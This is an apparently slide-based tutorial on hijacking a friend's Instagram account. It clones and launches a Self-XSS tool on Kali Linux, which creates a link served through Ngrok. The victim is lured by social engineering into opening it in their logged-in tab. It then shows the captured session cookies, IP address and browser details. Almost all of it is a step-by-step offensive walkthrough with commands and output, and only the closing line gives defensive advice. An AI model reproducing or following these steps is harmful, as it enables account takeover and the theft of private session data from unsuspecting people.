HACK INSTAGRAM OF YOUR FRIEND AND HIJACK HIS/HER INSTAGRAM COOKIES

1. HACK INSTAGRAM OF YOUR FRIEND AND HIJACK HIS/HER INSTAGRAM COOKIES INTRODUCTION Do you know, its easy is to hack the Instagram account of your friend and hijack his or her Instagram cookies. This is one of the tricks used by hackers to steal your Instagram account. Whenever we logged into any website suppose Instagram, the Instagram server stores small piece code (also called web cookie) in our browsers. As commented by the researcherof the International Institute of Cyber Security, “If we are able to steal or Hijack these web cookies (we got after authenticating/logging on Instagram), we can log in to the Instagram account of that person“. Today we will show, how easy is it to get the cookies of authenticated/logged user of a particular website that can be your friend or relative using the Self-XSS hacking tool. Self-XSS uses social engineering tool and using this hacker can gain control of the victims’ Instagram account. ENVIRONMENT • • OS: Kali Linux 2019.3 64 bit Kernel version: 5.2.0 INSTALLATION STEPS • • Use this command to clone the project. git clone https://github.com/thelinuxchoice/self-xss root@kali:/home/iicybersecurity# git clone https://github.com/thelinuxchoice/self-xss Cloning into 'self-xss'... remote: Enumerating objects: 38, done. remote: Counting objects: 100% (38/38), done. remote: Compressing objects: 100% (37/37), done. remote: Total 38 (delta 12), reused 0 (delta 0), pack-reused 0 Unpacking objects: 100% (38/38), 12.79 KiB | 422.00 KiB/s, done. • Use the cd command to enter into self-xss directory root@kali:/home/iicybersecurity# cd self-xss/ root@kali:/home/iicybersecurity/self-xss#

2. • Now, use this command to launch the tool bash self-xss.sh Self-XSS – Malicious code • After Launching the tool, first we have to enter the website name whose account we want to hack. In our case, it will be https://instagram.com Next, enter the Email and password details. Then the tool will downloads the Ngrok server automatically and start the PHP server and Ngrok server. Then it will give to malicious URL as we can see in the above picture. Now, send this malicious code to the victim using social engineering tricks and ask the victim to open this link in the same Instagram Browser Tab. • • • •

3. Self-XSS – Malicious code Injected • The Malicious code will captures the Instagram cookies and IP Address details of the victim and sends back to the hacker. • Now go to hacker machine where self-XSS is running. • go to cd /home/iicybersecurity/self-xss • To verify, use the cat command to view the details of the cookies. o cat cookies.backup root@kali:/home/iicybersecurity/self-xss# cat cookies.backup mid=XsYGMQALAAFTsuFdOqBKpj1oAJs6; csrftoken=2Z8ovGnPCnaRccQ7Og2GlPLWBIAj4zFD; ds_user_id=29687340949 • • We go the Instagram cookies. Now use cat command to view the IP and browser details . o cat saved.ip.txt

4. root@kali:/home/iicybersecurity/self-xss# cat saved.ip.txt IP: 112.196.159.115 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36 Here, we successfully got the victims IP address with Machine details and victim’s Instagram cookies. CONCLUSION Now, we saw how to find the cookies details of the victim using a self-XSS in combination with social engineering. So it is always recommended to never click on any suspicious link, and that too when you are logged into any social networking website or any other website.